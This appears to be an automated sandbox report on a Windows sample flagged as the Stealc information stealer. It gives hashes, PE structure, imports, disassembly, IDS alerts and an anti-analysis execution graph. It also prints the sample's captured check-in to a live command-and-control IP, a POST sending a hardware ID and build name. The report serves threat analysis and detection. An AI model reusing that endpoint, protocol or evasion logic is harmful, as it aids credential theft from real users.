                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="568229" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                          C:\Windows\appcompat\Programs\Amcache.hve

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.465440225227793
                                          Encrypted:false
                                          SSDEEP:6144:+IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNOdwBCswSbT:TXD94+WlLZMM6YFHQ+T
                                          MD5:4DDFDAF34FFAC067A05891A92976DAA2
                                          SHA1:06559F3352516C22D52FA42B912671F9202C63F2
                                          SHA-256:5B8FBBACCF367A71B3E17412735E214F4B59209E64888F5E17C3961C45C1C15E
                                          SHA-512:B474A066EEC10B59D36BDAF031B461C833F0AD94960A65E10919D560418337799C0A91D88FCEB7B19BAFDAC3D2A4DDE011AC2C3C7147CD5C10B11094FBAC3B8F
                                          Malicious:false
                                          Reputation:low
                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.a.b.+.................................................................................................................................................................................................................................................................................................................................................V........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.321067041627892
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.55%
                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:XJQkTVvJ3I.exe
                                          File size:712'704 bytes
                                          MD5:85bb8945ac7b0a1ceeb1f3783168b6ea
                                          SHA1:c8f62675f94208f80d9ac054963e87583cf01680
                                          SHA256:78f70275d462340e3f57293641aedd5de6112df4b51c1d9d11d35676260c147c
                                          SHA512:31826d492b5d6c53ceee068dc0a920c46c324604d69c9e25ff4bc23373aff756152b4cd9030b0b4d5fa5bddc7f789d23782696c916337aa3739f59fbc2e74cad
                                          SSDEEP:12288:pmqHGU8sNLDze0yUA1EkrogYuc+SXgo5tBzYc7spg0FsE8uopVxVSr:pVmDstB/AGk9ego5tZsC0NG/VS
                                          TLSH:1CE4022363B1BC65C46A46B24D1EC7E4362EB0317E5DEF6632196E6B08702B2D173753
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.{.*...*...*...4...4...4...4...4...U....Bn.)...*...W...4...+...4...+...4...+...Rich*...................PE..L....s.d...........

                                          File Icon

                                          Icon Hash:63796de971436e0f

                                          Static PE Info

                                          General

                                          Entrypoint:0x404fb0
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x64D273DE [Tue Aug 8 16:57:02 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:aff85f3e0949a3cfaa949ee7b7bc4b42

                                          Entrypoint Preview

                                          Instruction
                                          call 00007FBE78E3A31Dh
                                          jmp 00007FBE78E3750Eh
                                          mov edi, edi
                                          push ebp
                                          mov ebp, esp
                                          mov eax, dword ptr [ebp+08h]
                                          xor ecx, ecx
                                          cmp eax, dword ptr [00497010h+ecx*8]
                                          je 00007FBE78E376A5h
                                          inc ecx
                                          cmp ecx, 2Dh
                                          jc 00007FBE78E37683h
                                          lea ecx, dword ptr [eax-13h]
                                          cmp ecx, 11h
                                          jnbe 00007FBE78E376A0h
                                          push 0000000Dh
                                          pop eax
                                          pop ebp
                                          ret
                                          mov eax, dword ptr [00497014h+ecx*8]
                                          pop ebp
                                          ret
                                          add eax, FFFFFF44h
                                          push 0000000Eh
                                          pop ecx
                                          cmp ecx, eax
                                          sbb eax, eax
                                          and eax, ecx
                                          add eax, 08h
                                          pop ebp
                                          ret
                                          call 00007FBE78E39F52h
                                          test eax, eax
                                          jne 00007FBE78E37698h
                                          mov eax, 00497178h
                                          ret
                                          add eax, 08h
                                          ret
                                          call 00007FBE78E39F3Fh
                                          test eax, eax
                                          jne 00007FBE78E37698h
                                          mov eax, 0049717Ch
                                          ret
                                          add eax, 0Ch
                                          ret
                                          mov edi, edi
                                          push ebp
                                          mov ebp, esp
                                          push esi
                                          call 00007FBE78E37677h
                                          mov ecx, dword ptr [ebp+08h]
                                          push ecx
                                          mov dword ptr [eax], ecx
                                          call 00007FBE78E37617h
                                          pop ecx
                                          mov esi, eax
                                          call 00007FBE78E37651h
                                          mov dword ptr [eax], esi
                                          pop esi
                                          pop ebp
                                          ret
                                          push 0000000Ch
                                          push 00495520h
                                          call 00007FBE78E38540h
                                          mov ecx, dword ptr [ebp+08h]
                                          xor edi, edi
                                          cmp ecx, edi
                                          jbe 00007FBE78E376C0h
                                          push FFFFFFE0h
                                          pop eax
                                          xor edx, edx
                                          div ecx
                                          cmp eax, dword ptr [ebp+0Ch]
                                          sbb eax, eax
                                          inc eax
                                          jne 00007FBE78E376B1h
                                          call 00007FBE78E37623h
                                          mov dword ptr [eax], 0000000Ch
                                          push edi
                                          push edi
                                          push edi

                                          Rich Headers

                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x958fc0x28.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x10550.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2eb0000xc30.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3f700x40.text
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1a0.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x952500x9540052e078286856cdfe9654fab5aafdc27aFalse0.8623979271356784data7.617064064595542IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .data0x970000xade80x6200dfff8914e234ae930fc4f02bbb0d5be7False0.08653539540816327data1.0320790307906098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .filidow0xa20000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .yegih0xa30000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0xa40000x2465500x106002861680e18068e8453ba9a02b96004c8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x2eb0000x18f40x1a00c7dd24e148417d8b66e913c9aa86953dFalse0.4071514423076923data4.016815621490853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          PONUFIKOHEWIHUJAFEXOVUD0xad8e80x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilIndia0.6047337278106509
                                          PONUFIKOHEWIHUJAFEXOVUD0xad8e80x9e7ASCII text, with very long lines (2535), with no line terminatorsTamilSri Lanka0.6047337278106509
                                          VIDUHAVOCOKUVIZAVAMUDUVUZINA0xaf6400x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5871393453228102
                                          VIDUHAVOCOKUVIZAVAMUDUVUZINA0xaf6400x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5871393453228102
                                          YUFABIX0xae2d00x136fASCII text, with very long lines (4975), with no line terminatorsTamilIndia0.5939698492462312
                                          YUFABIX0xae2d00x136fASCII text, with very long lines (4975), with no line terminatorsTamilSri Lanka0.5939698492462312
                                          RT_CURSOR0xb14d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                          RT_CURSOR0xb23780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                          RT_CURSOR0xb2c200x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                          RT_ICON0xa46800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5403225806451613
                                          RT_ICON0xa46800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5403225806451613
                                          RT_ICON0xa4d480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4117219917012448
                                          RT_ICON0xa4d480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4117219917012448
                                          RT_ICON0xa72f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.44858156028368795
                                          RT_ICON0xa72f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.44858156028368795
                                          RT_ICON0xa77880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.49173773987206826
                                          RT_ICON0xa77880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.49173773987206826
                                          RT_ICON0xa86300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.47247292418772563
                                          RT_ICON0xa86300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.47247292418772563
                                          RT_ICON0xa8ed80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.434971098265896
                                          RT_ICON0xa8ed80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.434971098265896
                                          RT_ICON0xa94400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.27977178423236515
                                          RT_ICON0xa94400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.27977178423236515
                                          RT_ICON0xab9e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.28775797373358347
                                          RT_ICON0xab9e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.28775797373358347
                                          RT_ICON0xaca900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3086065573770492
                                          RT_ICON0xaca900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3086065573770492
                                          RT_ICON0xad4180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3404255319148936
                                          RT_ICON0xad4180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3404255319148936
                                          RT_DIALOG0xb34180x58data0.8977272727272727
                                          RT_STRING0xb34700x346dataTamilIndia0.46420047732696895
                                          RT_STRING0xb34700x346dataTamilSri Lanka0.46420047732696895
                                          RT_STRING0xb37b80x36edataTamilIndia0.4715261958997722
                                          RT_STRING0xb37b80x36edataTamilSri Lanka0.4715261958997722
                                          RT_STRING0xb3b280x672dataTamilIndia0.42424242424242425
                                          RT_STRING0xb3b280x672dataTamilSri Lanka0.42424242424242425
                                          RT_STRING0xb41a00x3b0dataTamilIndia0.4523305084745763
                                          RT_STRING0xb41a00x3b0dataTamilSri Lanka0.4523305084745763
                                          RT_ACCELERATOR0xb14780x58dataTamilIndia0.7954545454545454
                                          RT_ACCELERATOR0xb14780x58dataTamilSri Lanka0.7954545454545454
                                          RT_GROUP_CURSOR0xb31880x30data0.9375
                                          RT_GROUP_ICON0xa77580x30dataTamilIndia0.9375
                                          RT_GROUP_ICON0xa77580x30dataTamilSri Lanka0.9375
                                          RT_GROUP_ICON0xad8800x68dataTamilIndia0.7019230769230769
                                          RT_GROUP_ICON0xad8800x68dataTamilSri Lanka0.7019230769230769
                                          RT_VERSION0xb31b80x25cdata0.5447019867549668

                                          Imports

                                          DLLImport
                                          KERNEL32.dllGetComputerNameA, GetTempFileNameW, WriteConsoleInputW, GetConsoleAliasExesA, CallNamedPipeA, InterlockedIncrement, OpenJobObjectA, InterlockedDecrement, GetCurrentProcess, GetComputerNameW, GetTimeFormatA, FreeEnvironmentStringsA, GetCommConfig, GetDllDirectoryW, GetNumberFormatA, ClearCommBreak, EnumTimeFormatsW, TlsSetValue, GetCurrencyFormatW, SetFileShortNameW, LoadLibraryW, GetFileAttributesW, CreateProcessA, GetModuleFileNameW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GlobalUnfix, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, SetFileAttributesA, LoadLibraryA, SetEnvironmentVariableA, GetModuleFileNameA, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetVersionExA, ReadConsoleInputW, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, InitializeCriticalSectionAndSpinCount, GetModuleHandleA, RaiseException, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, SetFilePointer, SetEndOfFile, GetProcessHeap, ReadFile, HeapSize, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          TamilIndia
                                          TamilSri Lanka

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-11-01T00:27:00.114024+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.235.128.1680TCP
                                          2024-11-01T00:27:16.904776+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449737TCP
                                          2024-11-01T00:27:55.791732+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449743TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 1, 2024 00:26:58.988986015 CET4973080192.168.2.4185.235.128.16
                                          Nov 1, 2024 00:26:58.994076967 CET8049730185.235.128.16192.168.2.4
                                          Nov 1, 2024 00:26:58.994148016 CET4973080192.168.2.4185.235.128.16
                                          Nov 1, 2024 00:26:58.994386911 CET4973080192.168.2.4185.235.128.16
                                          Nov 1, 2024 00:26:58.999147892 CET8049730185.235.128.16192.168.2.4
                                          Nov 1, 2024 00:26:59.849078894 CET8049730185.235.128.16192.168.2.4
                                          Nov 1, 2024 00:26:59.849275112 CET4973080192.168.2.4185.235.128.16
                                          Nov 1, 2024 00:26:59.851385117 CET4973080192.168.2.4185.235.128.16
                                          Nov 1, 2024 00:26:59.856163025 CET8049730185.235.128.16192.168.2.4
                                          Nov 1, 2024 00:27:00.113955021 CET8049730185.235.128.16192.168.2.4
                                          Nov 1, 2024 00:27:00.114023924 CET4973080192.168.2.4185.235.128.16
                                          Nov 1, 2024 00:27:05.249753952 CET8049730185.235.128.16192.168.2.4
                                          Nov 1, 2024 00:27:05.249866962 CET4973080192.168.2.4185.235.128.16
                                          Nov 1, 2024 00:27:26.469217062 CET4973080192.168.2.4185.235.128.16

                                          HTTP Request Dependency Graph

                                          • 185.235.128.16

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449730185.235.128.16806588C:\Users\user\Desktop\XJQkTVvJ3I.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 1, 2024 00:26:58.994386911 CET89OUTGET / HTTP/1.1
                                          Host: 185.235.128.16
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Nov 1, 2024 00:26:59.849078894 CET203INHTTP/1.1 200 OK
                                          Date: Thu, 31 Oct 2024 23:26:59 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Content-Length: 0
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Nov 1, 2024 00:26:59.851385117 CET418OUTPOST /562c1eb14955c897.php HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                          Host: 185.235.128.16
                                          Content-Length: 217
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 41 44 39 35 35 30 30 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a
                                          Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="hwid"C12AD95500561166170430------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build"LogsDiller------HJJJDAEGIDHCBFHJJJEG--
                                          Nov 1, 2024 00:27:00.113955021 CET210INHTTP/1.1 200 OK
                                          Date: Thu, 31 Oct 2024 23:26:59 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Content-Length: 8
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 59 6d 78 76 59 32 73 3d
                                          Data Ascii: YmxvY2s=


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:19:26:57
                                          Start date:31/10/2024
                                          Path:C:\Users\user\Desktop\XJQkTVvJ3I.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\XJQkTVvJ3I.exe"
                                          Imagebase:0x400000
                                          File size:712'704 bytes
                                          MD5 hash:85BB8945AC7B0A1CEEB1F3783168B6EA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:19:26:59
                                          Start date:31/10/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 1332
                                          Imagebase:0x8a0000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:3.6%
                                            Dynamic/Decrypted Code Coverage:68.7%
                                            Signature Coverage:14%
                                            Total number of Nodes:1365
                                            Total number of Limit Nodes:26
                                            execution_graph 44503 401190 44510 417a70 GetProcessHeap HeapAlloc GetComputerNameA 44503->44510 44505 40119e 44506 4011cc 44505->44506 44512 4179e0 GetProcessHeap HeapAlloc GetUserNameA 44505->44512 44508 4011b7 44508->44506 44509 4011c4 ExitProcess 44508->44509 44511 417ac9 44510->44511 44511->44505 44513 417a53 44512->44513 44513->44508 44514 416c90 44557 4022a0 44514->44557 44531 4179e0 3 API calls 44532 416cd0 44531->44532 44533 417a70 3 API calls 44532->44533 44534 416ce3 44533->44534 44690 41acc0 44534->44690 44536 416d04 44537 41acc0 4 API calls 44536->44537 44538 416d0b 44537->44538 44539 41acc0 4 API calls 44538->44539 44540 416d12 44539->44540 44541 41acc0 4 API calls 44540->44541 44542 416d19 44541->44542 44543 41acc0 4 API calls 44542->44543 44544 416d20 44543->44544 44698 41abb0 44544->44698 44546 416dac 44702 416bc0 GetSystemTime 44546->44702 44547 416d29 44547->44546 44549 416d62 OpenEventA 44547->44549 44551 416d95 CloseHandle Sleep 44549->44551 44552 416d79 44549->44552 44554 416daa 44551->44554 44556 416d81 CreateEventA 44552->44556 44554->44547 44555 416db6 CloseHandle ExitProcess 44556->44546 44899 404610 17 API calls 44557->44899 44559 4022b4 44560 404610 34 API calls 44559->44560 44561 4022cd 44560->44561 44562 404610 34 API calls 44561->44562 44563 4022e6 44562->44563 44564 404610 34 API calls 44563->44564 44565 4022ff 44564->44565 44566 404610 34 API calls 44565->44566 44567 402318 44566->44567 44568 404610 34 API calls 44567->44568 44569 402331 44568->44569 44570 404610 34 API calls 44569->44570 44571 40234a 44570->44571 44572 404610 34 API calls 44571->44572 44573 402363 44572->44573 44574 404610 34 API calls 44573->44574 44575 40237c 44574->44575 44576 404610 34 API calls 44575->44576 44577 402395 44576->44577 44578 404610 34 API calls 44577->44578 44579 4023ae 44578->44579 44580 404610 34 API calls 44579->44580 44581 4023c7 44580->44581 44582 404610 34 API calls 44581->44582 44583 4023e0 44582->44583 44584 404610 34 API calls 44583->44584 44585 4023f9 44584->44585 44586 404610 34 API calls 44585->44586 44587 402412 44586->44587 44588 404610 34 API calls 44587->44588 44589 40242b 44588->44589 44590 404610 34 API calls 44589->44590 44591 402444 44590->44591 44592 404610 34 API calls 44591->44592 44593 40245d 44592->44593 44594 404610 34 API calls 44593->44594 44595 402476 44594->44595 44596 404610 34 API calls 44595->44596 44597 40248f 44596->44597 44598 404610 34 API calls 44597->44598 44599 4024a8 44598->44599 44600 404610 34 API calls 44599->44600 44601 4024c1 44600->44601 44602 404610 34 API calls 44601->44602 44603 4024da 44602->44603 44604 404610 34 API calls 44603->44604 44605 4024f3 44604->44605 44606 404610 34 API calls 44605->44606 44607 40250c 44606->44607 44608 404610 34 API calls 44607->44608 44609 402525 44608->44609 44610 404610 34 API calls 44609->44610 44611 40253e 44610->44611 44612 404610 34 API calls 44611->44612 44613 402557 44612->44613 44614 404610 34 API calls 44613->44614 44615 402570 44614->44615 44616 404610 34 API calls 44615->44616 44617 402589 44616->44617 44618 404610 34 API calls 44617->44618 44619 4025a2 44618->44619 44620 404610 34 API calls 44619->44620 44621 4025bb 44620->44621 44622 404610 34 API calls 44621->44622 44623 4025d4 44622->44623 44624 404610 34 API calls 44623->44624 44625 4025ed 44624->44625 44626 404610 34 API calls 44625->44626 44627 402606 44626->44627 44628 404610 34 API calls 44627->44628 44629 40261f 44628->44629 44630 404610 34 API calls 44629->44630 44631 402638 44630->44631 44632 404610 34 API calls 44631->44632 44633 402651 44632->44633 44634 404610 34 API calls 44633->44634 44635 40266a 44634->44635 44636 404610 34 API calls 44635->44636 44637 402683 44636->44637 44638 404610 34 API calls 44637->44638 44639 40269c 44638->44639 44640 404610 34 API calls 44639->44640 44641 4026b5 44640->44641 44642 404610 34 API calls 44641->44642 44643 4026ce 44642->44643 44644 419bb0 44643->44644 44903 419aa0 GetPEB 44644->44903 44646 419bb8 44647 419de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 44646->44647 44648 419bca 44646->44648 44649 419e44 GetProcAddress 44647->44649 44650 419e5d 44647->44650 44651 419bdc 21 API calls 44648->44651 44649->44650 44652 419e96 44650->44652 44653 419e66 GetProcAddress GetProcAddress 44650->44653 44651->44647 44654 419eb8 44652->44654 44655 419e9f GetProcAddress 44652->44655 44653->44652 44656 419ec1 GetProcAddress 44654->44656 44657 419ed9 44654->44657 44655->44654 44656->44657 44658 416ca0 44657->44658 44659 419ee2 GetProcAddress GetProcAddress 44657->44659 44660 41aa50 44658->44660 44659->44658 44661 41aa60 44660->44661 44662 416cad 44661->44662 44663 41aa8e lstrcpy 44661->44663 44664 4011d0 44662->44664 44663->44662 44665 4011e8 44664->44665 44666 401217 44665->44666 44667 40120f ExitProcess 44665->44667 44668 401160 GetSystemInfo 44666->44668 44669 401184 44668->44669 44670 40117c ExitProcess 44668->44670 44671 401110 GetCurrentProcess VirtualAllocExNuma 44669->44671 44672 401141 ExitProcess 44671->44672 44673 401149 44671->44673 44904 4010a0 VirtualAlloc 44673->44904 44676 401220 44908 418b40 44676->44908 44679 401249 __aulldiv 44680 40129a 44679->44680 44681 401292 ExitProcess 44679->44681 44682 416a10 GetUserDefaultLangID 44680->44682 44683 416a73 GetUserDefaultLCID 44682->44683 44684 416a32 44682->44684 44683->44531 44684->44683 44685 416a61 ExitProcess 44684->44685 44686 416a43 ExitProcess 44684->44686 44687 416a57 ExitProcess 44684->44687 44688 416a6b ExitProcess 44684->44688 44689 416a4d ExitProcess 44684->44689 44688->44683 44910 41aa20 44690->44910 44692 41acd1 lstrlenA 44694 41acf0 44692->44694 44693 41ad28 44911 41aab0 44693->44911 44694->44693 44696 41ad0a lstrcpy lstrcatA 44694->44696 44696->44693 44697 41ad34 44697->44536 44699 41abcb 44698->44699 44700 41ac1b 44699->44700 44701 41ac09 lstrcpy 44699->44701 44700->44547 44701->44700 44915 416ac0 44702->44915 44704 416c2e 44705 416c38 sscanf 44704->44705 44944 41ab10 44705->44944 44707 416c4a SystemTimeToFileTime SystemTimeToFileTime 44708 416c80 44707->44708 44709 416c6e 44707->44709 44711 415d60 44708->44711 44709->44708 44710 416c78 ExitProcess 44709->44710 44712 415d6d 44711->44712 44713 